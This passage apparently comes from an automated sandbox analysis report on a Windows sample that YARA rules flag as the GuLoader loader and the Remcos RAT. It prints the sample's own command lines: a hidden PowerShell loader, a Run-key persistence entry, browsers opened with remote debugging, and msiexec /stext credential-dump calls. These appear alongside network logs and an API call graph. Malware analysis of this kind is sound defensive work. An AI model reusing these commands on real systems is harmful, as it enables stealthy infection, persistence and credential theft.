2024-11-11 07:11:17 UTC | 468 | IN | Data Ascii: wwwgstaticcom|^)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.11.20 | 64413 | 149.112.112.112 | 443 | 6672 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-11 07:11:17 UTC | 233 | OUT | POST /dns-query HTTP/1.1
Host: dns.quad9.net
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2024-11-11 07:11:17 UTC | 128 | OUT | Data Ascii: wwwgstaticcom)TP
2024-11-11 07:11:17 UTC | 182 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Nov 2024 07:11:17 GMT
Connection: close
Content-Length: 60
Server: h2o/dnsdist
content-type: application/dns-message
cache-control: max-age=62
2024-11-11 07:11:17 UTC | 60 | IN | Data Ascii: wwwgstaticcom>J}^)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.11.20 | 57983 | 172.64.41.3 | 443 | 6672 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-11 07:11:17 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2024-11-11 07:11:17 UTC | 128 | OUT | Data Ascii: wwwgstaticcom)TP
2024-11-11 07:11:17 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Mon, 11 Nov 2024 07:11:17 GMT
                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                        CF-RAY: 8e0c77a7eb04676c-ATL
                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                        2024-11-11 07:11:17 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 b5 00 04 4a 7d 88 5e 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii: wwwgstaticcomJ}^)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.11.20 | 55810 | 149.112.112.112 | 443 | 6672 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-11 07:11:17 UTC | 233 | OUT | POST /dns-query HTTP/1.1
Host: dns.quad9.net
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2024-11-11 07:11:17 UTC | 128 | OUT | Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Data Ascii: wwwgstaticcom)TP
2024-11-11 07:11:17 UTC | 183 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Nov 2024 07:11:17 GMT
Connection: close
Content-Length: 60
Server: h2o/dnsdist
content-type: application/dns-message
cache-control: max-age=161
2024-11-11 07:11:17 UTC | 60 | IN | Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 a1 00 04 8e fa 69 5e 00 00 29 04 d0 00 00 00 00 00 00
Data Ascii: wwwgstaticcomi^)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.11.20 | 60368 | 172.64.41.3 | 443 | 6672 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-11 07:11:17 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2024-11-11 07:11:17 UTC | 128 | OUT | Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Data Ascii: wwwgstaticcom)TP
2024-11-11 07:11:17 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Mon, 11 Nov 2024 07:11:17 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 8e0c77a7fa4cadc6-ATL
alt-svc: h3=":443"; ma=86400
2024-11-11 07:11:17 UTC | 468 | IN | Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 eb 00 04 8e fa 69 5e 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Data Ascii: wwwgstaticcomi^)


Target ID: 0
Start time: 02:10:21
Start date: 11/11/2024
Path: C:\Users\user\Desktop\rPO3799039985.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\rPO3799039985.exe"
Imagebase: 0x400000
File size: 687'803 bytes
MD5 hash: EFB9125831992267D27C5DD9A2BDC0BE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 2
Start time: 02:10:23
Start date: 11/11/2024
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: powershell.exe -windowstyle hidden "$Polysaccum=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\Martyrization.Pra121';$Sikkerhedsforvaringernes=$Polysaccum.SubString(72097,3);.$Sikkerhedsforvaringernes($Polysaccum)
Imagebase: 0xd30000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.144033904631.00000000094FE000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: high
Has exited: true

Target ID: 3
Start time: 02:10:23
Start date: 11/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6dd370000
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 02:10:43
Start date: 11/11/2024
Path: C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\SysWOW64\msiexec.exe"
Imagebase: 0x7a0000
File size: 59'904 bytes
MD5 hash: 9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000003.144377552368.0000000005496000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.148892015439.00000000054A1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000003.144377552368.00000000054E7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000003.144376861712.0000000005496000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.148899066974.0000000021140000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.148889275088.000000000327F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.148892015439.0000000005496000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000003.144376861712.00000000054E7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.148889312327.00000000045CE000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                        Start time:02:10:47
                                                                                                                                                                                                        Start date:11/11/2024
                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Besmears" /t REG_EXPAND_SZ /d "%billigbogs% -windowstyle 1 $Cosier=(gp -Path 'HKCU:\Software\Curetted\').konvolutternes;%billigbogs% ($Cosier)"
                                                                                                                                                                                                        Imagebase:0x450000
                                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                        Start time:02:10:47
                                                                                                                                                                                                        Start date:11/11/2024
                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                        Imagebase:0x7ff6dd370000
                                                                                                                                                                                                        File size:875'008 bytes
                                                                                                                                                                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                                        Start time:02:10:47
                                                                                                                                                                                                        Start date:11/11/2024
                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Besmears" /t REG_EXPAND_SZ /d "%billigbogs% -windowstyle 1 $Cosier=(gp -Path 'HKCU:\Software\Curetted\').konvolutternes;%billigbogs% ($Cosier)"
                                                                                                                                                                                                        Imagebase:0x250000
                                                                                                                                                                                                        File size:59'392 bytes
                                                                                                                                                                                                        MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:8
                                                                                                                                                                                                        Start time:02:10:57
                                                                                                                                                                                                        Start date:11/11/2024
                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:--user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
                                                                                                                                                                                                        Imagebase:0x7ff6c8090000
                                                                                                                                                                                                        File size:2'742'376 bytes
                                                                                                                                                                                                        MD5 hash:BB7C48CDDDE076E7EB44022520F40F77
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                                        Start time:02:10:58
                                                                                                                                                                                                        Start date:11/11/2024
                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\xocgcuufvngxpkogqqu"
                                                                                                                                                                                                        Imagebase:0x7a0000
                                                                                                                                                                                                        File size:59'904 bytes
                                                                                                                                                                                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                                        Start time:02:10:58
                                                                                                                                                                                                        Start date:11/11/2024
                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\hihycffzjvycrqdkhbgvqc"
                                                                                                                                                                                                        Imagebase:0x7a0000
                                                                                                                                                                                                        File size:59'904 bytes
                                                                                                                                                                                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                                        Start time:02:10:58
                                                                                                                                                                                                        Start date:11/11/2024
                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\rlmjdxqbxdqhcwrorltxbhbpx"
                                                                                                                                                                                                        Imagebase:0x7a0000
                                                                                                                                                                                                        File size:59'904 bytes
                                                                                                                                                                                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                                        Start time:02:10:59
                                                                                                                                                                                                        Start date:11/11/2024
                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --field-trial-handle=2204,i,2239432924243639277,16353558222963723582,262144 --variations-seed-version --mojo-platform-channel-handle=2220 /prefetch:3
                                                                                                                                                                                                        Imagebase:0x7ff6c8090000
                                                                                                                                                                                                        File size:2'742'376 bytes
                                                                                                                                                                                                        MD5 hash:BB7C48CDDDE076E7EB44022520F40F77
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:15
                                                                                                                                                                                                        Start time:02:11:10
Start date: 11/11/2024
Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit): false
Commandline: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
Imagebase: 0x7ff7e42e0000
File size: 3'379'080 bytes
MD5 hash: 40AAE14A5C86EA857FA6E5FED689C48E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 16
Start time: 02:11:10
Start date: 11/11/2024
Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,10008014947784373590,7267593141464040591,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2428 /prefetch:3
Imagebase: 0x7ff7e42e0000
File size: 3'379'080 bytes
MD5 hash: 40AAE14A5C86EA857FA6E5FED689C48E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 17
Start time: 02:11:10
Start date: 11/11/2024
Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory=Default --flag-switches-begin --flag-switches-end --do-not-de-elevate
Imagebase: 0x7ff7e42e0000
File size: 3'379'080 bytes
MD5 hash: 40AAE14A5C86EA857FA6E5FED689C48E
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 20
Start time: 02:11:11
Start date: 11/11/2024
Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2044,2106387817418742249,13274120828406319396,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2444 /prefetch:3
Imagebase: 0x7ff7e42e0000
File size: 3'379'080 bytes
MD5 hash: 40AAE14A5C86EA857FA6E5FED689C48E
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 26
Start time: 02:11:13
Start date: 11/11/2024
Path: C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.31\identity_helper.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.31\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2044,2106387817418742249,13274120828406319396,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6276 /prefetch:8
Imagebase: 0x7ff7b5d70000
File size: 1'113'992 bytes
MD5 hash: 688D7C201AD85A9C6EDAFDC457E53219
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 27
Start time: 02:11:13
Start date: 11/11/2024
Path: C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.31\identity_helper.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.31\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2044,2106387817418742249,13274120828406319396,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6276 /prefetch:8
Imagebase: 0x7ff7b5d70000
File size: 1'113'992 bytes
MD5 hash: 688D7C201AD85A9C6EDAFDC457E53219
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Execution Graph

Execution Coverage: 22.5%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 23%
Total number of Nodes: 1226
Total number of Limit Nodes: 34
3803->3805 3806 4023c8 3804->3806 3807 402a3a 18 API calls 3804->3807 3808 4023d4 3806->3808 3811 402a1d 18 API calls 3806->3811 3810 4023c1 lstrlenA 3807->3810 3809 4023ef RegSetValueExA 3808->3809 3812 402e9f 32 API calls 3808->3812 3813 402405 RegCloseKey 3809->3813 3810->3806 3811->3808 3812->3809 3813->3805 3815 401dea 3816 402a3a 18 API calls 3815->3816 3817 401df0 3816->3817 3818 402a3a 18 API calls 3817->3818 3819 401df9 3818->3819 3820 402a3a 18 API calls 3819->3820 3821 401e02 3820->3821 3822 402a3a 18 API calls 3821->3822 3823 401e0b 3822->3823 3824 401423 25 API calls 3823->3824 3825 401e12 ShellExecuteA 3824->3825 3826 401e3f 3825->3826 3827 40366d 3828 403678 3827->3828 3829 40367c 3828->3829 3830 40367f GlobalAlloc 3828->3830 3830->3829 3831 401eee 3832 402a3a 18 API calls 3831->3832 3833 401ef5 3832->3833 3834 4060c8 5 API calls 3833->3834 3835 401f04 3834->3835 3836 401f1c GlobalAlloc 3835->3836 3837 401f84 3835->3837 3836->3837 3838 401f30 3836->3838 3839 4060c8 5 API calls 3838->3839 3840 401f37 3839->3840 3841 4060c8 5 API calls 3840->3841 3842 401f41 3841->3842 3842->3837 3846 405c8d wsprintfA 3842->3846 3844 401f78 3847 405c8d wsprintfA 3844->3847 3846->3844 3847->3837 3848 4014f0 SetForegroundWindow 3849 4028cf 3848->3849 3855 4018f5 3856 40192c 3855->3856 3857 402a3a 18 API calls 3856->3857 3858 401931 3857->3858 3859 4055d1 69 API calls 3858->3859 3860 40193a 3859->3860 3861 4024f7 3862 402a3a 18 API calls 3861->3862 3863 4024fe 3862->3863 3866 4059a2 GetFileAttributesA CreateFileA 3863->3866 3865 40250a 3866->3865 3867 4018f8 3868 402a3a 18 API calls 3867->3868 3869 4018ff 3868->3869 3870 405525 MessageBoxIndirectA 3869->3870 3871 401908 3870->3871 3872 4014fe 3873 401506 3872->3873 3875 401519 3872->3875 3874 402a1d 18 API calls 3873->3874 3874->3875 3876 402b7f 3877 402ba7 3876->3877 3878 402b8e SetTimer 3876->3878 3879 402bfc 3877->3879 3880 402bc1 MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 3877->3880 3878->3877 3880->3879 3881 
401000 3882 401037 BeginPaint GetClientRect 3881->3882 3883 40100c DefWindowProcA 3881->3883 3885 4010f3 3882->3885 3888 401179 3883->3888 3886 401073 CreateBrushIndirect FillRect DeleteObject 3885->3886 3887 4010fc 3885->3887 3886->3885 3889 401102 CreateFontIndirectA 3887->3889 3890 401167 EndPaint 3887->3890 3889->3890 3891 401112 6 API calls 3889->3891 3890->3888 3891->3890 2808 402482 2819 402b44 2808->2819 2810 40248c 2823 402a1d 2810->2823 2812 402495 2813 40249f 2812->2813 2816 4026a6 2812->2816 2814 4024b8 RegEnumValueA 2813->2814 2815 4024ac RegEnumKeyA 2813->2815 2814->2816 2817 4024d1 RegCloseKey 2814->2817 2815->2817 2817->2816 2826 402a3a 2819->2826 2821 402b5d 2822 402b6b RegOpenKeyExA 2821->2822 2822->2810 2824 405d51 18 API calls 2823->2824 2825 402a31 2824->2825 2825->2812 2827 402a46 2826->2827 2828 405d51 18 API calls 2827->2828 2829 402a67 2828->2829 2830 402a73 2829->2830 2831 405f9a 5 API calls 2829->2831 2830->2821 2831->2830 3892 401b02 3893 402a3a 18 API calls 3892->3893 3894 401b09 3893->3894 3895 402a1d 18 API calls 3894->3895 3896 401b12 wsprintfA 3895->3896 3897 4028cf 3896->3897 2832 402283 2833 40228b 2832->2833 2835 402291 2832->2835 2834 402a3a 18 API calls 2833->2834 2834->2835 2836 402a3a 18 API calls 2835->2836 2837 4022a1 2835->2837 2836->2837 2838 402a3a 18 API calls 2837->2838 2840 4022af 2837->2840 2838->2840 2839 402a3a 18 API calls 2841 4022b8 WritePrivateProfileStringA 2839->2841 2840->2839 3898 401a03 3899 402a3a 18 API calls 3898->3899 3900 401a0c ExpandEnvironmentStringsA 3899->3900 3901 401a20 3900->3901 3903 401a33 3900->3903 3902 401a25 lstrcmpA 3901->3902 3901->3903 3902->3903 2877 405086 2878 405231 2877->2878 2879 4050a8 GetDlgItem GetDlgItem GetDlgItem 2877->2879 2881 405261 2878->2881 2882 405239 GetDlgItem CreateThread CloseHandle 2878->2882 2922 403f49 SendMessageA 2879->2922 2883 4052b0 2881->2883 2884 405277 ShowWindow ShowWindow 2881->2884 2885 40528f 2881->2885 2882->2881 2925 40501a OleInitialize 
2882->2925 2891 403f7b 8 API calls 2883->2891 2924 403f49 SendMessageA 2884->2924 2886 4052ea 2885->2886 2889 4052c3 ShowWindow 2885->2889 2890 40529f 2885->2890 2886->2883 2893 4052f7 SendMessageA 2886->2893 2887 405118 2892 40511f GetClientRect GetSystemMetrics SendMessageA SendMessageA 2887->2892 2896 4052e3 2889->2896 2897 4052d5 2889->2897 2894 403eed SendMessageA 2890->2894 2895 4052bc 2891->2895 2898 405171 SendMessageA SendMessageA 2892->2898 2899 40518d 2892->2899 2893->2895 2900 405310 CreatePopupMenu 2893->2900 2894->2883 2904 403eed SendMessageA 2896->2904 2903 404f48 25 API calls 2897->2903 2898->2899 2901 4051a0 2899->2901 2902 405192 SendMessageA 2899->2902 2905 405d51 18 API calls 2900->2905 2906 403f14 19 API calls 2901->2906 2902->2901 2903->2896 2904->2886 2907 405320 AppendMenuA 2905->2907 2908 4051b0 2906->2908 2909 405351 TrackPopupMenu 2907->2909 2910 40533e GetWindowRect 2907->2910 2911 4051b9 ShowWindow 2908->2911 2912 4051ed GetDlgItem SendMessageA 2908->2912 2909->2895 2913 40536d 2909->2913 2910->2909 2914 4051dc 2911->2914 2915 4051cf ShowWindow 2911->2915 2912->2895 2916 405214 SendMessageA SendMessageA 2912->2916 2917 40538c SendMessageA 2913->2917 2923 403f49 SendMessageA 2914->2923 2915->2914 2916->2895 2917->2917 2918 4053a9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 2917->2918 2920 4053cb SendMessageA 2918->2920 2920->2920 2921 4053ed GlobalUnlock SetClipboardData CloseClipboard 2920->2921 2921->2895 2922->2887 2923->2912 2924->2885 2926 403f60 SendMessageA 2925->2926 2927 40503d 2926->2927 2930 401389 2 API calls 2927->2930 2931 405064 2927->2931 2928 403f60 SendMessageA 2929 405076 CoUninitialize 2928->2929 2930->2927 2931->2928 3904 402308 3905 402338 3904->3905 3906 40230d 3904->3906 3908 402a3a 18 API calls 3905->3908 3907 402b44 19 API calls 3906->3907 3909 402314 3907->3909 3910 40233f 3908->3910 3911 402a3a 18 API calls 3909->3911 3914 402355 3909->3914 3915 402a7a RegOpenKeyExA 3910->3915 3912 402325 
